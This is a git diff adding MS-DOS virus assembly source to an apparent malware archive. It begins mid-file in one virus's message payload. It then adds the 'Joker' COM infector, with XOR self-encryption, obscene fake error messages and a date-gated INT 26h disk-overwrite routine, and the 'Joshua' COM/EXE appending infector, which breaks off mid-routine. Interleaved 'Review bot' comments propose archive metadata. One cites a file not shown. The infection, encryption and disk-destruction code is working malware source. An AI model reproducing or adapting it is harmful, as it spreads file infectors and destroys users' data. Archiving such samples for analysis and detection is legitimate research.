cx,word ptr [bp+DTA+21] ; Get original file attribute + call SET_ATTR ; Set attribute + + pop bx ; Take CALL off stack + + +; ****** B O M B S E C T I O N ****** + +; Check to see if the virus is ready to activate. +; Put all activation tests and bombs here. 
+ +CONDITIONS: ; mov ah,2ah ; DOS get date + ; int 21h ; Call DOS to do it + ; cmp dx,1001h ; Check for Oct 1st + ; jl BOMB_DONE ; Not time yet + ; mov ah,2ch ; DOS get time + ; int 21h ; Call DOS to do it + ; cmp cl,25h ; Check for 25 min past + ; jl BOMB_DONE ; Not time yet + +BOMB: mov ah,3h ; BIOS find cursor position + mov bh,0 ; Video page 0 + int 10h ; Call BIOS to do it + push dx ; Save original Row and Column + mov cx,6 ; Number of lines to print + lea si,[bp+VERSE] ; Location of VERSE + mov dx,080ah ; Row and Column of output +PRINTLOOP: mov ah,2h ; BIOS set cursor + int 10h ; Set cursor + push dx ; Save Row and Column + mov ah,9h ; DOS print string + mov dx,si ; Location of VERSE + int 21h ; Call DOS to print it + pop dx ; Get Row and Column + inc dh ; Increment Row + add si,54 ; Go to next line of VERSE + loop PRINTLOOP ; Print all lines + + mov ah,00h ; Read character from keybd + int 16h + + pop dx ; Get original Row Column + mov ah,2h ; BIOS set cursor + int 10h ; Call BIOS to do it + +BOMB_DONE: jmp QUIT ; Go back to host program + +VERSE: db 'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·$' + db 'º Guess what ??? º$' + db 'º You have been victimized by a virus!!! Do not º$' + db 'º try to reboot your computer or even turn it º$' + db 'º off. You might as well read this and weep! º$' + db 'ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ',7,7,'$' + +; Write routine to append the virus to the end of the file. + +WRITE_START: + pop bx ; Get back file handle + push bx ; Save it again + mov ah,40h ; DOS write to file + mov cx,END_VIRUS-DECRYPT ; Length of virus + lea dx,[bp+DECRYPT] ; Start from beginning of virus + int 21h ; Call DOS to do it +WRITE_END: + + +; New INT 24h handler. + +NEWINT24: mov al,3 ; Fail call + iret ; Return + + +;*** Subroutine OPEN *** +; Open a file. Takes AL as parameter. 
+ +OPEN proc near + mov ah,3dh ; DOS open file, read/write + lea dx,[bp+DTA+30] ; Point to filename we found + int 21h ; Call DOS to do it + xchg ax,bx ; Put file handle in BX + retn ; Return +OPEN endp + +;*** Subroutine SET_ATTR *** +; Takes CX as a parameter + +SET_ATTR proc near + mov ax,4301h ; DOS change file attr + lea dx,[bp+DTA+30] ; Point to file name + int 21h ; Call DOS + retn ; Return +SET_ATTR endp + + +; This area will hold all variables to be encrypted + +COM_MASK db '*.com',0 ; COM file mask +EXE_MASK db '*.exe',0 ; EXE file mask +DOTDOT db '..',0 ; Go up one directory +COM_START db 0cdh,20h,0 ; Header for infected file +BACKSLASH db '\' ; Backslash for directory + +START endp + +END_VIRUS equ $ ; Mark end of virus code + +; This data area is a scratch area and is not included in virus code. + +ORIG_DIR db 64 dup(?) ; Holds original directory + +OLDINT24 dd ? ; Storage for old INT 24 vector + +BUFFER db 24 dup(?) ; Read buffer and EXE header + +DTA db 43 dup(?) ; New DTA location + +APPEND: db (START_VIRUS-DECRYPT)*2+(WRITE_END-WRITE_START)+3 dup(?) + +ENDHEAP: + + end MAIN diff --git a/MSDOS/Virus.MSDOS.Unknown.joker.asm b/MSDOS/Virus.MSDOS.Unknown.joker.asm new file mode 100644 index 00000000..54bb6b05 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.joker.asm 
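Review bot: MSDOS/Virus.MSDOS.Unknown.johnb.asm is a byte-identical copy of MSDOS/Virus.MSDOS.Unknown.joshua.asm added later in this same patch (both file headers show blob `282fbde0` and 484 added lines), so the archive now carries one sample under two names without either file saying so. If the second name is a known alias, a one-line header such as `; Archive note: identical to Virus.MSDOS.Unknown.joshua.asm (same blob); kept under the alias name` in each file would let consumers deduplicate on content rather than on path. Separately, the `VERSE` strings in this hunk (`'ÖÄÄÄ…·$'`, `'º …º$'`) look like CP437 box-drawing bytes reinterpreted in an 8-bit Western code page, and the same applies to the `ÄÄÄ` separator comments and `msg20` text in MSDOS/Virus.MSDOS.Unknown.joker.asm. Because those bytes are part of the sample's on-screen payload and therefore of any content-based signature, the repository should mark these files binary or CP437 (for example through `.gitattributes`) so a round trip through an editor does not silently change them.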
@@ -0,0 +1,541 @@ + title " Joker! virus. Written by The BOOT SECTOR Infector ... " +; +; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original +; had multiple programming errors in it that kept it from replicating. +; My version is much more successful. +; + + + page 255,80 +code segment word public 'code' + assume cs:code,ds:code + org 100h +main proc;edure + + +;EQUates... + idc equ 69h ;ID character - (note: 69) + cr equ 13 ;ASCII for carriage return + lf equ 10 ;ASCII for line feed + +;End codes. These determine what happens after the string is displayed. + + terminate equ 0 ;Terminate program after display + halt equ 1 ;Cause the system to hang after display + SimulateCritErr equ 2 ;Simulate the critical error handler + return2host equ 3 ;Resume program immediately + FlashFloppy equ 4 ;Wait for a key, then reset Drive A: + WaitKey equ 5 ;Wait for a key, then resume program + PauseKey equ 6 ;Same thing, but uses a pause message + StackError equ 7 ;Cause a stack overflow (halts system) + + + +tof: ;Top-Of-File + jmp begin ;Skip over program +idchar: db idc ;ID character + +HostProgram: nop ;First run copy only! + nop ;First run copy only! + +first_four: nop ;First run copy only! +address: int 20h ;First run copy only! +check: nop ;First run copy only! + +begin: call nextline ;Push IP+3 onto stack +nextline: pop bp ;mov bp,ip + sub bp,offset nextline ;bp=disp. for mem locs + + push ax ;Save AX + call cryptor ;Decrypt + jmp short retloc ;Continue program + +cryptor: mov al,[bp+offset encrypt_val] ;encrypt val + lea si,[bp+offset toec] ;Top Of Encrypted Code + mov cx,offset eoec-offset toec ;Length of " " +cryptorloop: xor [si],al ;en/de crypt + rol al,cl ;change code # + inc si ;Next char please! 
+ loop cryptorloop ;loop if necessary + ret ;Return to caller + +infect: call cryptor ;Encrypt code + pop cx ;Restore CX for INT 21 + int 21h ;Call DOS + call cryptor ;Decrypt code + ret ;Go back + +toec:;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄTop Of Encrypted Code +InfectIt: push cx ;Save CX for sub + jmp infect + +retloc: pop ax ;Restore AX + xor di,di ;DI = 0 + + cli ;Disable interrupts + mov ss,di ;Set up stack at: + mov sp,2F0h ; 0000:02F0 + sti ;Enable interrupts + + mov si,96h ;Vector for INT 24h + mov bx,ss:[si] ;BX = offset in segment + mov cx,ss:[si+2] ;CX = segment + lea dx,[bp+offset int24handler] ;CS:DX -} local handler + mov ss:[si],DX ;Save offset + mov ss:[si+2],cs ;Save segment + mov si,es:[di+2F8h] ;Check operation mode + cmp si,4643h ;'CF' if already TSRed + jne GoOn ;Nope, jmp + jmp return ;Yes, don't do anything + +GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP + mov cs:[di+4Eh],cx ; to save BX and CX + push cs ;Copy CS ... + pop es ; ... to DS + + mov byte ptr [bp+offset infected],0 ;Reset infection count + mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less + +GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes + mov di,offset tof ;TOF never changes + cld ;Read left-to-right + movsw ;Copy the 4 bytes + movsw ;Copy the 4 bytes + + mov ah,1Ah ;Set DTA address ... + lea dx,[bp+offset DTA] ; ... to *our* DTA + int 21h ;Call DOS to set DTA + + mov ah,4Eh ;Find First ASCIIZ + lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 + lea si,[bp+offset filename] ;Point to file + push dx ;Save DX + jmp short continue ;Continue... + +return: mov ah,1ah ;Set DTA address ... + mov dx,80h ; ... to default DTA + int 21h ;Call DOS to set DTA + xor di,di ;DI= 0 + mov es,di ;ES= 0 + mov si,96h ;Vector for INT 24h + mov bx, cs:[di+4Ch] ;Restore from saved BX + mov word ptr es:[si+0], bx ;Place back into vector + mov cx, cs:[di+4Eh] ;Restore from saved CX + mov word ptr es:[si+2], cx ;Place back into vector + push cs ;Move CS ... 
+ pop es ; ... to ES + + mov ax,[bp+offset SavedAX] ;Restore AX + xor bx,bx ;BX= 0 + mov cx,bx ;CX= 0 + mov dx,cx ;DX= 0 + mov si,dx ;SI= 0 + mov di,si ;DI= 0 + mov sp,0FFFEh ;SP= FFFEh (normal) + mov bp,100h ;BP= 100h (RETurn addr) + push bp ; Put on stack + mov bp,ax ;BP= 0 + ret ;JMP to 100h + +nextfile: or bx,bx ;Did we open the file? + jz skipclose ;No, so don't close it + mov ah,3Eh ;Close file + int 21h ;Call DOS to close it + xor bx,bx ;Set BX back to 0 +skipclose: mov ah,4Fh ;Find Next ASCIIZ + +continue: pop dx ;Restore DX + push dx ;Re-save DX + xor cx,cx ;CX= 0 + xor bx,bx + int 21h ;Find First/Next + jnc skipjmp + jmp NoneLeft ;Out of files + +skipjmp: mov ax,3D02h ;open file + mov dx,si ;point to filespec + int 21h ;Call DOS to open file + jc nextfile ;Next file if error + + mov bx,ax ;get the handle + mov ah,3Fh ;Read from file + mov cx,4 ;Read 4 bytes + lea dx,[bp+offset first_four] ;Read in the first 4 + int 21h ;Call DOS to read + + cmp byte ptr [bp+offset check],idc ;Already infected? + je nextfile ;Yep, try again ... +;NOTE: Delete the two lines above if you want it to re-infected programs. + + cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? + je nextfile ;Yep, maybe next time! + + mov ax,4202h ;LSeek to EOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + cmp ah,0F8h ;Longer than 62K? + ja nextfile ;Yep, try again... 
+ mov [bp+offset addr],ax ;Save call location + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;Point to buffer + int 21h ;Save the first 4 bytes + + mov ah,[bp+offset encrypt_val] ;Get code number + inc ah ;add 1 + adc ah,0 ;increment if it's zero + mov [bp+offset encrypt_val],ah ;Save new code number + + mov ah,40h ;Write to file + mov cx,offset eof-offset begin ;Length of target code + lea dx,[bp+offset begin] ;Point to virus start + call InfectIt ;Exempt from encryption +ComeBackHere: mov ax,4200h ;LSeek to TOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + mov ax,[bp+offset addr] ;Retrieve location + inc ax ;Adjust location + + mov [bp+offset address],ax ;address to call + mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. + mov byte ptr [bp+offset check],idc ;EOFMARK + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;4 bytes are at [DX] + int 21h ;Write to file + + inc byte ptr [bp+offset infected] ;increment counter + dec byte ptr [bp+offset max2kill] ;decrement counter + jz TheEnd ;If 0 then End + + inc byte ptr [bp+offset encrypt_val] ;change code # + adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0 + jmp nextfile ;Next victim! + +NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected? + jae TheEnd ;The party's over! + + mov di,100h ;DI= 100h + cmp word ptr [di],20CDh ;an INT 20h? + je TheEnd ;Don't go to prev. dir. + + lea dx,[bp+offset prevdir] ;'..' + mov ah,3Bh ;Set current directory + int 21h ;CHDIR .. + jc TheEnd ;We're through! + mov ah,4Eh + jmp continue ;Start over in new dir + +TheEnd: xor di,di ;DI= 0 + mov es,di ;ES= 0 + mov ah,2ah ;Get date + int 21h ;Do it + cmp dl,4 ;4th of the month? + jne test2 ;Nope, second test + cmp dh,7 ;July? + jne test2 ;Nope, second test + xor ax,ax ;Sector 0 + jmp Kill ;Kill the disk now... + +test2: mov ah,2ch ;Get time + int 21h ;Do it + or cl,cl ;On the hour? 
(x:00 xM) + jnz GiveUp ;Return to program + cmp ch,6 ;Midnight to 5 AM ??? + jnl GiveUp ;Return to program + add cl,ch ;Add first number + mov ax,cx ;Transfer to AX + cbw ;Zero out AH + add al,dh ;Add DL to AL + adc al,dl ;Add DL and carry flag + adc ah,0 ;Add carry to AH + or ax,ax ;AX = 0 ??? + jnz Kill ;Kill the disk now... + inc ax ;Well, adjust first... + +Kill: mov dx,ax ;Sector number + mov cx,1 ;One at a time.... + xor bx,bx ;Point at PSP + mov ah,19h ;Get current disk + int 21h ;Call DOS to ^ + int 26h ;Now kill the disk + +GiveUp: mov bx,offset message_table ;point to table + + mov ah,2ch ;Get time + int 21h ;Call DOS to ^ + inc dh ;(0-59) + +timeloop: cmp dh,msgs ;mapped yet? + jl timedone ;Yes, jump + sub dh,msgs ;try to map it + jmp short timeloop ;and check out work + +timedone: mov al,dh ;AL gets msg # + mov cl,al ;Save in CL for CritErr + cbw ;AH gets 0 + shl ax,1 ;AX = AX * 2 + add bx,ax ;BX = index + mov si,[bx] ;SI points to string + mov ch,[si-1] ;CH is technique # + mov dx,si ;DX points to string + + mov ah,9 ;Display string + int 21h ;Call DOS to ^ + + cmp ch,terminate ;Terminate program? + je TerminateProg ;Nope, next test + + cmp ch,halt ;Halt program? + je $ ;Hang system if ch=halt + + cmp ch,SimulateCritErr ;Simulate CritErr? + je simulate ;yes, go do it + + cmp ch,Return2host ;Return to host? + je ResumeProgram ;yes, go do it + + cmp ch,FlashFloppy ;Flash drive A:? + je FlashFlop ;Yes, go do it + + cmp ch,WaitKey ;Wait for keypress? + je zwait ;Yes, go do it + + cmp ch,PauseKey ;Pause message w/ wait? + je zpause ;Yes, go do it + + cmp ch,StackError ;Stack overflow? + je StackErr ;Yes, go do it + + ;Invalid code, assume Return2host + +ResumeProgram: jmp return ;Return to caller +StackErr: call $ ;Cause stack overflow +TerminateProg: int 20h ;Yep, all done! + +simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... 
+ mov ah,9 ;Print string + int 21h ;Call DOS to ^ + + mov ah,1 ;Input a char + int 21h ;Call DOS to ^ + + lea dx,[bp+offset crlf] ;crlf + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + + cmp al,'a' ;Uppercase? + jb uppercase ;Nope, jump + sub al,' ' ;Yes, make uppercase + +uppercase: cmp al,'A' ;Abort? + je terminateprog ;Yep, go do it. + + cmp al,'R' ;Retry? + jne zskip ;skip over "retry" code + + lea dx,[bp+offset crlf] ;Point to crlf + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + mov dh,cl ;Restore DH from CL + jmp timedone ;Reprint error + +zskip: cmp al,'I' ;Ignore? + je ResumeProgram ;Return to host program + cmp al,'F' ;Fail? + jne simulate ;Invalid response + + lea dx,[bp+offset fail24] ;Point to fail string + mov ah,9 ;Print string + int 21h ;Call DOS to ^ + int 20h ;Terminate program + +FlashFlop: mov ah,1 ;Wait for keypress + int 21h ;Call DOS to ^ + + xor ax,ax ;Drive A: + mov cx,1 ;Read 1 sector + mov dx,ax ;Start at boot sector + lea bx,[bp+offset boot_sector] ;BX points to buffer + int 25h ;Flash light on A: + jmp short ResumeProgram ;Resume if no error + +zpause: lea dx,[bp+offset pause] ;Point to pause message + mov ah,9 ;Print string + int 21h ;Call DOS to ^ +zwait: + mov ah,1 ;Wait for keypress + int 21h ;Call DOS to ^ + jmp short ResumeProgram ;Go on... + + + + + +ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' +fail24 db cr,lf,cr,lf,'Fail on INT 24' +crlf db cr,lf,'$' + +message_table: + dw offset msg1 + dw offset msg2 + dw offset msg3 + dw offset msg4 + dw offset msg5 + dw offset msg6 + dw offset msg7 + dw offset msg8 + dw offset msg9 + dw offset msg10 + dw offset msg11 + dw offset msg12 + dw offset msg13 + dw offset msg14 + dw offset msg15 + dw offset msg16 + dw offset msg17 + dw offset msg18 + dw offset msg19 + dw offset msg20 + +msgs db 20 + +; I tried to make it as simple as possible to change the messages +; and add/delete them. 
Each message is in the format: +; +; db [technique] +;[label] db [Text] +; +; Where [technique] is one of the 8 codes shown at the beginning of +; this file (terminate, halt, etc.). This determines what the virus +; should do after printing the message. +; [label] is in the form "msg##" where ## is a number from 1 to +; "msgs". "msgs" is defined immediately before this +; comment block. +; [text] is a combination of text and ASCII codes, terminated by +; either a '$' or a ,36. +; +; If you change the number of messages the virus has, you should also +; add/remove lines from the offset table and change the "msgs" +; data byte appropriately. Let's say for instance that you want +; to remove "Program too big to fit in memory.": +; 1) Delete the line(s) with the message and the line +; immediately before it. +; 2) Move message #20 up to message #2's position and +; change its label from "msg20" to "msg2". +; 3) Delete the line "dw offset msg20" from the offset +; table. +; 4) Change the line before this comment block to: +; "msgs db 19" +; +; Later! +; -The BOOT SECTOR Infector ... +; + + db FlashFloppy ;Waits for key, then flashes drive A: +msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf +pause db 'Strike any key when ready... $' + + db SimulateCritErr ;Prints ARIF message and responds appropriately +msg1 db 'Impotence error reading user',39,'s dick$' + + db terminate ;Ends the program immediately +msg2 db 'Program too big to fit in memory',cr,lf,'$' + + db halt ;Halts the system +msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$' + + db terminate ;Ends the program immediately +msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid' + db ' I can',39,'t do that!',cr,lf,'$' + + db WaitKey ;Waits for a keypress, then runs the program +msg6 db 'Format another? (Y/N)? $' + + db StackError ;Generates a stack overflow (halts the system) +msg7 db 'Damn it! 
I told you not to touch that!$' + + db terminate ;Ends the program immediately +msg8 db 'Suck me!',cr,lf,'$' + + db SimulateCritErr ;Prints ARIF message and responds appropriately +msg9 db 'Cocksucker At Keyboard error reading device CON:$' + + db terminate ;Ends the program immediately +msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf + db 'I',39,'m sorry, but your call cannot be completed as dialed.' + db cr,lf,'Please hang up & try your call again.',cr,lf,'$' + + db terminate ;Ends the program immediately +msg11 db 'No!',cr,lf,cr,lf,'$' + + db halt ;Halts the system +msg12 db 'Panic kernal mode interrupt$' + + db WaitKey ;Waits for a keypress, then runs the program +msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$' + + db return2host ;Runs host program immediately +msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$' + + db terminate ;Ends the program immediately +msg15 db 'And if I refuse?',cr,lf,'$' + + db return2host ;Runs host program immediately +msg16 db 'Fuck the world and its followers!',cr,lf,'$' + + db return2host ;Runs host program immediately +msg17 db 'You are pathetic, man... you know that?',cr,lf,'$' + + db terminate ;Ends the program immediately +msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$' + + db terminate ;Ends the program immediately +msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$' + + db PauseKey ;Waits for keypress (SAKWR), then runs host prg +msg20 db 'Joker! ver àà by TBSI!',cr,lf + db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$' + +int24handler: xor al,al ;Ignore the error + iret ;Interrupt return + + +filespec: db '*.COM',0 ;File specification +prevdir: db '..',0 ;previous directory +max2kill db 3 ;max. files to infect + +eoec:;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄEnd Of Encrypted Code +VersionNumber dw 100h ;Version 1.00 +encrypt_val db 0 ;1st-run copy only + +; None of this information is included in the virus's code. 
It is only used +; during the search/infect routines and it is not necessary to preserve it +; in between calls to them. + +eof: +DTA: + + db 21 dup (?) ;internal search's data +attribute db ? ;attribute +file_time db 2 dup (?) ;file's time stamp +file_date db 2 dup (?) ;file's date stamp +file_size db 4 dup (?) ;file's size +filename db 13 dup (?) ;filename + +SavedAX dw ? ;Used to save AX +infected db ? ;infection count +addr dw ? ;Address + +boot_sector: + + main endp;rocedure + code ends;egment + + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.joshua.asm b/MSDOS/Virus.MSDOS.Unknown.joshua.asm new file mode 100644 index 00000000..282fbde0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.joshua.asm 
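Review bot: The header comment at the top of this hunk describes the file only as a remake of the "Joker/Jocker" virus and records neither the provenance of this copy nor that the `TheEnd`/`Kill` path issues an absolute disk write (`int 26h`) when the date or time check matches, which is the first property an archive consumer needs when classifying the sample. I'd extend the header, in the file's existing `;` comment style, with `; Archive note: source/origin of this copy: <PLACEHOLDER>` and `; Classification: COM infector; destructive payload (INT 26h absolute disk write, date/time gated)`. The `title` line names the author but says nothing about where or when the archive obtained the text, so that placeholder should be filled from the collection record rather than inferred from the source.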
@@ -0,0 +1,484 @@ +;****************************************************************** +;* * +;* My First Virus, a simple non-overwriting COM and EXE * +;* infector. * +;* by, Joshua * +;* * +;****************************************************************** + +ID = 'SS' ; My ID + + .model tiny ; Memory model + .code ; Start Code + org 100h ; Start of COM file + +MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS + +START proc near + +DECRYPT: mov bx,offset START_VIRUS ; Find out our offset + mov cx,(END_VIRUS-START_VIRUS)/2 +DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx +KEY dw 0 ; Crypt KEY + add bx,2 ; Increment offset + dec cx ; Decrement counter + jnz DECRYPT_LOOP ; Continue until done + +START_VIRUS: + call FIND_OFFSET ; Real start of virus + +; Calculate change in offset from host program. + +FIND_OFFSET: pop bp ; BP holds current IP + sub bp, offset FIND_OFFSET ; Calculate net change + ; Change BP to start of + ; virus code + +; Capture INT 24h Critical error handler. + + push es ; Save ES + mov ax,3524h ; DOS get interupt vector + int 21h ; Call DOS to do it + mov word ptr [bp+OLDINT24],bx ; Save old INT 24h + mov word ptr [bp+OLDINT24+2],es ; vector + mov ah,25h ; DOS set interupt vector + lea dx,[bp+NEWINT24] ; Address of new interupt + int 21h ; Call DOS to do it + pop es ; Restore ES + +; Find out what kind of program I am, COM or EXE, by checking stack pointer. +; This is where I store my ID in an EXE infection. + + cmp sp,ID ; COM or EXE? + je RESTORE_EXE ; I am an EXE file + +; Restore original bytes to the COM program. + +RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes + mov di,100h ; to 100h, start of file + push di ; Jmp to 100h when done + movsw ; Copy 3 bytes + movsb + jmp short RESTORE_DONE + +; Restore original bytes to the EXE program. 
+ +RESTORE_EXE: push ds ; Save original DS + push es ; Save original ES + push cs ; Set DS = CS + pop ds + push cs ; Set ES = CS + pop es + lea si,[bp+JMPSAVE] ; Copy original CS:IP and + lea di,[bp+JMPSAVE2] ; SS:SP for return + movsw ; Copy 8 bytes + movsw + movsw + movsw + +; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy +; original command line parameters. + +RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area + mov ah,1ah ; DOS set DTA + int 21h ; Call DOS to do it + +; Save original directory. + + mov ah,47h ; DOS get current directory + lea si,[bp+ORIG_DIR] ; Store it here + mov dl,0 ; Current drive + int 21h ; Call DOS to do it + +; Search for a file to infect. + +SEARCH: lea dx,[bp+EXE_MASK] ; Search for any EXE file + call FINDFIRST ; Begin search + lea dx,[bp+COM_MASK] ; Search for any COM file + call FINDFIRST ; Begin search + + mov ah,3bh ; DOS change directory + lea dx,[bp+DOTDOT] ; Go up one direcotry + int 21h ; Call DOS to do it + jnc SEARCH ; Go look for more files + +; Restore default DTA, original directory, and pass control back to +; original program. + +QUIT: mov ah,3bh ; DOS change directory + lea dx,[bp+ORIG_DIR-1] ; Point to original directory + int 21h ; Call DOS to do it + push ds ; Save DS + mov ax,2524h ; DOS set interupt vector + lds dx,[bp+OLDINT24] ; Restore INT 24h + int 21h ; Call DOS to do it + pop ds ; Restore DS + mov ah,1ah ; DOS set DTA + mov dx,80h ; Restore original DTA + cmp sp,ID-4 ; EXE or COM? 
ES,DS on stack + jz QUIT_EXE ; Pass control to host EXE + +QUIT_COM: int 21h ; Call DOS to set DTA + retn ; Remember, 100h was on stack + +QUIT_EXE: pop es ; Restore original ES + pop ds ; Restore original DS + int 21h ; Call DOS to set DTA + mov ax,es ; AX = begin of PSP segment + add ax,16 ; Add size of PSP to get CS + add word ptr cs:[bp+JMPSAVE2+2],ax ; Restore IP + add ax,word ptr cs:[bp+STACKSAVE2+2] ; Calculate SS + cli ; Clear interrupts + mov sp,word ptr cs:[bp+STACKSAVE2] ; Restore SP + mov ss,ax ; Restore SS + sti ; Set interrupts + db 0eah ; Jump SSSS:OOOO + +JMPSAVE2 dd ? ; CS:IP for EXE return +STACKSAVE2 dd ? ; SS:SP for EXE return +JMPSAVE dd ? ; Original EXE CS:IP +STACKSAVE dd ? ; Original EXE SS:SP + +CREATOR db '[Joshua]' ; That's me! + +; DOS Findfirst / Findnext services + +FINDFIRST: mov ah,4eh ; DOS find first service + mov cx,7 ; Choose files w/ any attribute +FINDNEXT: int 21h ; Call DOS to do it + jc END_SEARCH ; Quit if there are errors + ; or no more files + +; Ok, if I am here, then I found a possible victim. First open the file +; for read only. + + mov al,0 ; DOS Open file, read only + call OPEN ; Open the file + +; Read in the beginning bytes to check for previous infection and then close. + + mov ah,3fh ; DOS Read file + lea dx,[bp+BUFFER] ; Save the original header + mov cx,24 ; Read 24 bytes + int 21h ; Call DOS to do it + mov ah,3eh ; DOS close file + int 21h ; Call DOS to do it + +; Check if the file is an EXE. + +CHECK_EXE: cmp word ptr [bp+BUFFER],'ZM' ; Is it an EXE? + jne CHECK_COM ; Nope, see if it's a COM + cmp word ptr [bp+BUFFER+16],ID; Is it already infected? + je ANOTHER ; Yep, so try another + jmp short INFECT_EXE ; We got one! Go infect it! + + +; Check if the file is COMMAND.COM + +CHECK_COM: cmp word ptr [bp+DTA+35],'DN' ; Check for COMMAND.COM + jz ANOTHER ; If it is, try another file + +; Now, check for previous infection by checking for our presence at +; the end of the file. 
+ + mov ax,word ptr [bp+DTA+26] ; Put total filesize in AX + cmp ax,(65535-(ENDHEAP-DECRYPT)); Check if too big + jle ANOTHER ; If so, try another + mov cx,word ptr [bp+BUFFER+1] ; Put jmp offset in CX + add cx,END_VIRUS-DECRYPT+3 ; Add virus size to jmp offset + cmp ax,cx ; Compare file size's + jnz INFECT_COM ; If healthy, go infect it + +ANOTHER: mov ah,4fh ; Otherwise find another + jmp short FINDNEXT ; possible victim + +END_SEARCH: retn ; No files found + +;*** Subroutine INFECT_COM *** + +INFECT_COM: + +; Save the first three bytes of the COM file + + lea si,[bp+BUFFER] ; Start of first 3 bytes + lea di,[bp+COM_START] ; Store them here + movsw ; Transfer the 3 bytes + movsb + +; Calculate jump offset for header of victim so it will run virus first. +; AX has the filesize. Store new JMP and OFFSET in the buffer. + + mov cx,3 ; No. bytes to write in header + sub ax,cx ; Filesize - jmp_offset + mov byte ptr [si-3],0e9h ; Store new JMP command + mov word ptr [si-2],ax ; plus offset + add ax,(103h+(START_VIRUS-DECRYPT)); New START_VIRUS OFFSET + push ax ; Save it for later + jmp DONE_INFECTION ; We're done! + +;*** Subroutine INFECT_EXE *** + +INFECT_EXE: + +; Save original CS:IP and SS:SP. + + les ax,dword ptr [bp+BUFFER+20] ; Get original CS:IP + mov word ptr [bp+JMPSAVE],ax ; Store IP + mov word ptr [bp+JMPSAVE+2],es ; Store CS + les ax,dword ptr [bp+BUFFER+14] ; Get original SS:SP + mov word ptr [bp+STACKSAVE],es ; Store SP + mov word ptr [bp+STACKSAVE+2],ax ; Store SS + +; Get get the header size in bytes. + + mov ax,word ptr [bp+BUFFER+8] ; Get header size + mov cl,4 ; Convert paragraphs to bytes + shl ax,cl ; Multiply by 16 + xchg ax,bx ; Put header size in BX + +; Get file size. + + les ax,[bp+offset DTA+26] ; Get filesize to + mov dx,es ; DX:AX format + + push ax ; Save filesize + push dx + + sub ax,bx ; Subtract header size + sbb dx,0 ; from filesize + + mov cx,16 ; Convert to SEGMENT:OFFSET + div cx ; form + +; Store new entry point (CS:IP) in header. 
+ + mov word ptr [bp+BUFFER+20],dx; Store IP + mov word ptr [bp+BUFFER+22],ax; Store CS + + add dx,START_VIRUS-DECRYPT ; New START_VIRUS offset + mov bx,dx ; Hold it for now + +; Store new stack frame (SS:SP) in header. + + mov word ptr [bp+BUFFER+14],ax; Store SS + mov word ptr [bp+BUFFER+16],ID; Store SP + + pop dx ; Get back filesize + pop ax + + add ax,END_VIRUS-START_VIRUS ; Add virus size + adc dx,0 ; to filesize + + push ax ; Save AX + mov cl,9 ; Divide AX + shr ax,cl ; by 512 + ror dx,cl + stc ; Set carry flag + adc dx,ax ; Add with carry + pop ax ; Get back AX + and ah,1 ; Mod 512 + +; Store new filesize in header. + + mov word ptr [bp+BUFFER+4],dx ; Store new filesize + mov word ptr [bp+BUFFER+2],ax + + push cs ; Restore ES + pop es + mov cx,24 ; No. bytes to write in header + + push bx ; Save START_VIRUS offset + +; Write virus to victim and restore the file's original timestamp, datestamp, +; and attributes. These values were stored in the DTA by the +; Findfirst / Findnext services. + +DONE_INFECTION: + push cx ; Save no. bytes to write + xor cx,cx ; Clear attributes + call SET_ATTR ; Set attributes + + mov al,2 ; DOS open file for read/write + call OPEN ; Open the file + +; Write the new header at the beginning of the file. + + mov ah,40h ; DOS write to file + pop cx ; Number of bytes to write + lea dx,[bp+BUFFER] ; Point to the bytes to write + int 21h ; Call DOS to do it + +; Move to end of file. + + mov ax,4202h ; DOS set read/write pointer + xor cx,cx ; Set offset move to zero + cwd ; Equivalent to xor dx,dx + int 21h ; Call DOS to do it + +; Append virus to end of file. 
